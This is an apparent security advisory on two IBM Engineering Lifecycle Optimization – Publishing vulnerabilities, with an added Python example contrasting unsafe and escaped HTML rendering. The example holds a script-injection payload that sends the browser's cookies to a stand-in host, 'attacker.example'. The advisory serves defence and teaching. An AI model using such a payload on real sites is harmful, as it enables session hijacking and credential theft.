Rewterz Threat Advisory – IBM Engineering Lifecycle Optimization Vulnerabilities

Severity

Medium

Analysis Summary

CVE-2021-39016 (CVSS: 4.3)
IBM Engineering Lifecycle Optimization – Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 does not sufficiently monitor or control the volume of network traffic it transmits, so an actor can cause the software to transmit more traffic than should be allowed for that actor.

CVE-2021-39015 (CVSS: 5.4)
IBM Engineering Lifecycle Optimization – Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. A user can embed arbitrary JavaScript in the Web UI, altering its intended functionality; when another user views the injected content within a trusted session, the script executes in that user's browser and can disclose credentials or session tokens.
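The following is an added illustration of the vulnerability class described above (unescaped user input reaching a Web UI, then exfiltrating session data); it is not IBM's code and says nothing about where the flaw sits in Publishing. The attacker payload, the `JSESSIONID` cookie name and the header values are constructed for the example.

```python
import html
from typing import Dict

# Constructed sample input: a field value a malicious user might submit through the Web UI.
# Reading document.cookie is the classic route to "credentials disclosure within a trusted session".
ATTACKER_INPUT = (
    '<script>new Image().src="https://attacker.example/?c="'
    '+encodeURIComponent(document.cookie)</script>'
)


def render_unsafe(label: str) -> str:
    """Vulnerable pattern: user-controlled text is concatenated straight into HTML,
    so a <script> element in the input becomes a live script in every viewer's browser."""
    return f"<p>Report label: {label}</p>"


def render_safe(label: str) -> str:
    """Hardened pattern: HTML-escape user text before it enters the markup.
    quote=True also neutralises quotes, which matters inside attribute values."""
    return f"<p>Report label: {html.escape(label, quote=True)}</p>"


def session_headers(session_id: str) -> Dict[str, str]:
    """Defence-in-depth response headers (assumed values, not IBM's configuration).
    HttpOnly keeps the session cookie out of document.cookie even if a script does run;
    the CSP refuses inline scripts, so an injected <script> block is not executed."""
    return {
        "Set-Cookie": f"JSESSIONID={session_id}; HttpOnly; Secure; SameSite=Strict",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to contrast the two renderers: is there a raw <script> tag
    in the HTML that will be sent to the browser?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe :", render_unsafe(ATTACKER_INPUT))
    print("safe   :", render_safe(ATTACKER_INPUT))
    print("headers:", session_headers("example-session-id"))
```

Escaping at the output boundary is the fix for the bug itself; the HttpOnly flag and the Content-Security-Policy header limit what a successful injection can steal and are worth checking on any affected deployment while patching.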

Impact

  • Security Bypass
  • Cross-Site Scripting

Indicators Of Compromise

CVE

  • CVE-2021-39016
  • CVE-2021-39015

Affected Vendors

IBM

Affected Products

  • IBM Engineering Lifecycle Optimization Publishing 6.0.6
  • IBM Engineering Lifecycle Optimization Publishing 6.0.6.1
  • IBM Engineering Lifecycle Optimization Publishing 7.0
  • IBM Engineering Lifecycle Optimization Publishing 7.0.1
  • IBM Engineering Lifecycle Optimization Publishing 7.0.2

Remediation

Refer to the IBM Security Bulletin for patch, upgrade, or suggested workaround information.